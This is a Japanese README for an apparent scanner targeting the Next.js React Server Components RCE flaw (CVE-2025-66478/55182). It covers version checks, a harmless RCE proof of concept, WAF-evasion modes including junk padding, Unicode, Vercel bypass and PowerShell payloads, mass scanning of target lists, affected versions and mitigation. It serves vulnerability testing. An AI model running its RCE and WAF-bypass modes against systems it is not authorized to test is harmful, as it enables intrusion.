
Next.js RCE(CVE-2025-66478/55182)向けのマルチモード脆弱性スキャナ。安全なサイドチャネル検出、RCE概念実証、WAFバイパス技術、ローカルプロジェクト依存関係スキャンを備えています。
Next.js RSC リモートコード実行脆弱性のための最も包括的なスキャナー
╔════════════════════════════════════════════════════════════════════════╗
║ ____ _ ___ ____ _ _ _ ║
║ | _ \ ___ __ _ ___| |_|__ \/ ___|| |__ ___| | | ║
║ | |_) / _ \/ _` |/ __| __| / /\___ \| '_ \ / _ \ | | ║
║ | _ < __/ (_| | (__| |_ / /_ ___) | | | | __/ | | ║
║ |_| \_\___|\__,_|\___|\__|____|____/|_| |_|\___|_|_| ║
║ ║
║ React2Shell Ultimate CVE-2025-66478 スキャナー v1.0.0 ║
║ Next.js RSC リモートコード実行脆弱性 ║
╠════════════════════════════════════════════════════════════════════════╣
║ ║
║ ║
╠════════════════════════════════════════════════════════════════════════╣
║ モード: --safe (サイドチャネル) | --rce (PoC) | --version | --local ║
║ WAF回避: --waf-bypass | --vercel-bypass | --unicode ║
╚════════════════════════════════════════════════════════════════════════╝
CVE-2025-66478(別名 CVE-2025-55182)は、React Server Components(RSC)を使用するNext.jsアプリケーションに影響を与えるCRITICAL(CVSS 10.0) のリモートコード実行脆弱性です。
このツールは、複数のCVE-2025-66478スキャナーの優れた機能を組み合わせています:
# リポジトリのクローン
git clone https://github.com/hackersatyamrastogi/react2shell-ultimate.git
cd react2shell-ultimate
# 依存関係のインストール
pip install -r requirements.txt
# または手動でインストール
pip install requests tqdm
# バージョン検出のみ(最速、悪用なし)
python3 react2shell-ultimate.py -u https://target.com --version
# 安全なサイドチャネル検出(コード実行なし)
python3 react2shell-ultimate.py -u https://target.com --safe
# RCE 概念実証(無害な計算を実行:41*271=11111)
python3 react2shell-ultimate.py -u https://target.com --rce
# すべての回避試行を含む包括的スキャン
python3 react2shell-ultimate.py -u https://target.com --comprehensive
# ファイルから複数のターゲットをスキャン
python3 react2shell-ultimate.py -l targets.txt -t 20 -o results.json
# クワイエットモード - 脆弱なホストのみ表示
python3 react2shell-ultimate.py -l targets.txt -q
# JSON出力を標準出力へ
python3 react2shell-ultimate.py -l targets.txt --json
# カレントディレクトリをスキャン
python3 react2shell-ultimate.py --local .
# 特定のプロジェクトパスをスキャン
python3 react2shell-ultimate.py --local /path/to/nextjs/projects
# ジャンクデータバイパス(128KBのパディングを追加してコンテンツ検査を回避)
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass
# カスタムジャンクデータサイズ
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass --waf-bypass-size 256
# Unicodeエンコーディングバイパス
python3 react2shell-ultimate.py -u https://target.com --rce --unicode
# Vercel固有のWAFバイパス
python3 react2shell-ultimate.py -u https://target.com --rce --vercel-bypass
# Windowsターゲット(PowerShellペイロード)
python3 react2shell-ultimate.py -u https://target.com --rce --windows
# プロキシを使用
python3 react2shell-ultimate.py -u https://target.com --rce --proxy http://127.0.0.1:8080
# カスタムヘッダー
python3 react2shell-ultimate.py -u https://target.com --rce -H "Authorization: Bearer token"
# タイムアウトの延長
python3 react2shell-ultimate.py -u https://target.com --rce --timeout 30
# 詳細出力
python3 react2shell-ultimate.py -u https://target.com --comprehensive -v
--safe)コードを実行せずに特定のエラーレスポンスパターンをトリガーします。エラーハンドリングの動作を通じて脆弱なRSC実装を識別します。
--rce)無害な数学計算(echo $((41*271)) = 11111)を実行してRCE機能を確認します。結果はX-Action-Redirectヘッダーに表示されます。
--version)X-Powered-ByヘッダーでNext.jsバージョンを確認VaryヘッダーでRSC指標を分析text/x-componentレスポンスをプローブ--local)プロジェクトディレクトリ内で以下をスキャン:
package.json - 直接の依存関係宣言package-lock.json - NPMロックファイルyarn.lock - Yarnロックファイルpnpm-lock.yaml - PNPMロックファイルbun.lockb - Bunロックファイル[VULNERABLE] https://target.com
Version: 15.3.1 | Status: 200 | Method: rce_poc
WAF Bypass: SUCCESS
[NOT VULNERABLE] https://safe-target.com
Version: 15.5.7 | Status: 200 | Method: http_headers
[WAF BLOCKED] https://protected.com
Version: 15.2.0 | Status: 403 | Method: rce_poc
WAF Detected: Exploit blocked
{
"tool": "React2Shell Ultimate CVE-2025-66478 Scanner",
"version": "1.0.0",
"cve_ids": ["CVE-2025-55182", "CVE-2025-66478"],
"scan_time": "2025-12-06T12:00:00Z",
"total_results": 1,
"results": [
{
"url": "https://target.com",
"vulnerable": true,
"version": "15.3.1",
"status_code": 200,
"detection_method": "rce_poc",
"waf_detected": false,
"waf_bypassed": false
}
]
}
脆弱なアプリケーションを発見した場合:
直ちに修正済みバージョンにアップグレード:
一時的な緩和策:
ログで悪用試行を監視
このツールは許可されたセキュリティテストおよび教育目的のみで提供されます。
MITライセンス - 詳細はLICENSEファイルを参照してください。
⭐ このリポジトリが役立つと思ったらスターを付けてください! ⭐
| バージョン範囲 | ステータス |
|---|
| Next.js 15.0.0 - 15.0.4 | ⚠️ 脆弱 |
| Next.js 15.1.0 - 15.1.8 | ⚠️ 脆弱 |
| Next.js 15.2.0 - 15.2.5 | ⚠️ 脆弱 |
| Next.js 15.3.0 - 15.3.5 | ⚠️ 脆弱 |
| Next.js 15.4.0 - 15.4.7 | ⚠️ 脆弱 |
| Next.js 15.5.0 - 15.5.6 | ⚠️ 脆弱 |
| Next.js 16.0.0 - 16.0.6 | ⚠️ 脆弱 |
| Next.js 14.3.0-canary.77+ | ⚠️ 脆弱 |
| Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7+ | ✅ 修正済み |
| Next.js 16.0.7+ | ✅ 修正済み |
| Next.js 13.x, 14.x 安定版 | ✅ 影響なし |
| 機能 | 説明 |
|---|
| 🔍 マルチモード検出 | 安全なサイドチャネル、RCE PoC、バージョン取得、ローカルスキャン |
| 🛡️ WAF回避技術 | ジャンクデータパディング、Unicodeエンコーディング、Vercel固有の回避 |
| 📁 ローカルプロジェクトスキャン | package.json、ロックファイルをスキャンして脆弱な依存関係を検出 |
| ⚡ 高性能 | 設定可能な同時実行数によるマルチスレッドスキャン |
| 📊 複数の出力形式 | コンソール、JSON、ファイルエクスポート |
| 🎯 正確なバージョン検出 | HTTPヘッダー、RSCフィンガープリンティング、修正済みバージョンの認識 |
| オプション | 説明 |
|---|
-u, --url | スキャンする単一のURL |
-l, --list | URLを含むファイル(1行に1つ) |
--local | ローカルプロジェクトディレクトリをスキャン |
--safe | 安全なサイドチャネル検出(RCEなし) |
--rce | RCE 概念実証モード |
--version | バージョン検出のみ |
--comprehensive | すべての技術を使用した完全スキャン |
--waf-bypass | WAF回避のためのジャンクデータ追加 |
--waf-bypass-size | ジャンクデータサイズ(KB、デフォルト:128) |
--unicode | WAF回避のためのUnicodeエンコーディング |
--vercel-bypass | Vercel固有のWAF回避 |
--windows | Windows PowerShellペイロードを使用 |
-t, --threads | 同時スレッド数(デフォルト:10) |
--timeout | リクエストタイムアウト(秒、デフォルト:10) |
-k, --insecure | SSL検証を無効化 |
--proxy | プロキシURL(http://host:port) |
-H, --header | カスタムヘッダー(繰り返し可能) |
-o, --output | 出力ファイル(JSON) |
--all-results | 脆弱なものだけでなくすべての結果を保存 |
-v, --verbose | 詳細出力 |
-q, --quiet | 脆弱なホストのみ表示 |
--json | JSON出力を標準出力へ |
--no-color | 色付き出力を無効化 |